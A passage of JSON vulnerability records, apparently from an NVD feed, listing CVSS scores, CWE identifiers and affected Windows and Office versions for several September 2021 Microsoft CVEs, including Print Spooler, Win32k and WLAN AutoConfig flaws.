"Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-38671.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-40447", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:41:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-40447", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-40447", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:13", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38671, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38667", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:53:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-38667", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38667", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:13", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38671", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:52:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-38671", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38671", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:09", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36975.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38639", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-26T21:31:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-38639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38639", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:35:44", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38639.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-36975", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-26T21:08:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004"], "id": "CVE-2021-36975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36975", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:35:40", "description": "Visual Studio Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-36952", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36952"], "modified": "2021-09-24T17:40:00", "cpe": ["cpe:/a:microsoft:visual_studio_2017:15.9", "cpe:/a:microsoft:visual_studio_2019:16.7"], "id": "CVE-2021-36952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:visual_studio_2017:15.9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:visual_studio_2019:16.7:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:12", "description": "Microsoft Word Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38656", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38656"], "modified": "2021-09-24T19:09:00", "cpe": ["cpe:/a:microsoft:365_apps:-"], "id": "CVE-2021-38656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38656", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2023-05-23T15:39:13", "description": "Microsoft Office Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38659", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38659"], "modified": "2021-09-24T19:03:00", "cpe": ["cpe:/a:microsoft:365_apps:-"], "id": "CVE-2021-38659", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38659", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:365_apps:-:*:*:*:enterprise:*:*:*"]}, {"lastseen": "2023-05-23T15:35:42", "description": "Windows DNS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-36968", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36968"], "modified": "2021-09-24T18:20:00", "cpe": ["cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2008:r2"], "id": "CVE-2021-36968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36968", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2023-05-23T15:35:42", "description": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-36965", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36965"], "modified": "2021-09-25T11:27:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-36965", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:31:48", "description": "Windows Scripting Engine Memory Corruption Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": 